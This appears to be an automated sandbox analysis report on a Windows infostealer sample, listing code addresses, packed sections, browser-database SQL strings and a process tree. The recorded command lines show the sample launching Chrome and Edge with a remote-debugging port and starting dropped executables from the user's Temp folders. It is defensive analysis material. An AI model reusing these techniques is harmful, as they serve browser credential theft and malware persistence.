Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E0E20	0_2_6C7E0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AEC0	0_2_6C70AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0EC0	0_2_6C7A0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786E90	0_2_6C786E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C2F70	0_2_6C7C2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C848FB0	0_2_6C848FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EF40	0_2_6C76EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706F10	0_2_6C706F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DEFF0	0_2_6C7DEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C700FE0	0_2_6C700FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840F20	0_2_6C840F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70EFB0	0_2_6C70EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D4840	0_2_6C7D4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C750820	0_2_6C750820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A820	0_2_6C78A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8068E0	0_2_6C8068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C738960	0_2_6C738960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81C9E0	0_2_6C81C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756900	0_2_6C756900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7349F0	0_2_6C7349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C09B0	0_2_6C7C09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7909A0	0_2_6C7909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA9A0	0_2_6C7BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77CA70	0_2_6C77CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8A30	0_2_6C7B8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AEA00	0_2_6C7AEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77EA80	0_2_6C77EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C806BE0	0_2_6C806BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0BA0	0_2_6C7A0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82A480	0_2_6C82A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718460	0_2_6C718460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A430	0_2_6C78A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C764420	0_2_6C764420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7464D0	0_2_6C7464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79A4D0	0_2_6C79A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0570	0_2_6C7A0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C762560	0_2_6C762560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758540	0_2_6C758540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E5F0	0_2_6C78E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA5E0	0_2_6C7CA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804540	0_2_6C804540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C848550	0_2_6C848550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F45B0	0_2_6C6F45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C650	0_2_6C75C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E6E0	0_2_6C75E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E6E0	0_2_6C79E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7246D0	0_2_6C7246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C780700	0_2_6C780700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A7D0	0_2_6C72A7D0
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_008278BB	19_2_008278BB
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_00827049	19_2_00827049
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_00828860	19_2_00828860
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_008231A8	19_2_008231A8
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_008F8101	19_2_008F8101
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_007E4B30	19_2_007E4B30
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_008F7B6E	19_2_008F7B6E
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_00822D10	19_2_00822D10
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_007E4DE0	19_2_007E4DE0
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_0082779B	19_2_0082779B
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_00817F36	19_2_00817F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BD78BB	20_2_00BD78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BD8860	20_2_00BD8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BD7049	20_2_00BD7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BD31A8	20_2_00BD31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00B94B30	20_2_00B94B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00B94DE0	20_2_00B94DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BD2D10	20_2_00BD2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BD779B	20_2_00BD779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BC7F36	20_2_00BC7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BD78BB	21_2_00BD78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BD8860	21_2_00BD8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BD7049	21_2_00BD7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BD31A8	21_2_00BD31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B94B30	21_2_00B94B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B94DE0	21_2_00B94DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BD2D10	21_2_00BD2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BD779B	21_2_00BD779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BC7F36	21_2_00BC7F36

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C729B10 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C88D930 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C723620 appears 42 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8809D0 appears 157 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C88DAE0 appears 39 times
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: String function: 007F80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BADF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00BA80C0 appears 260 times

Source: file.exe, 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2439538981.000000006C6E2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: olxddulo ZLIB complexity 0.9949438383132175
Source: random[1].exe0.23.dr	Static PE information: Section: olxddulo ZLIB complexity 0.9949438383132175
Source: d77e539f5f.exe.23.dr	Static PE information: Section: olxddulo ZLIB complexity 0.9949438383132175

Source: skotes.exe.19.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@90/314@51/27

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\AV0ENE57.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\26a96191-4fe0-4812-b5cf-7bbba781e379.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2260827443.000000001D749000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181168669.000000001D755000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784377364.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774656989.00000000054E2000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2773972820.0000000005500000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939625031.0000000005A03000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922759481.00000000059E5000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2921539768.0000000005A04000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3167351338.00000000058DD000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166629833.00000000058FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2439066809.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2431867069.000000001D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2196,i,18163450385097544274,7880029711802891747,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2228,i,14114506295457722425,16393737817898672495,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7188 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7336 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAKJDAAFB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsJDAKJDAAFB.exe "C:\Users\user\DocumentsJDAKJDAAFB.exe"
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAKJDAAFB.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2196,i,18163450385097544274,7880029711802891747,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2228,i,14114506295457722425,16393737817898672495,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
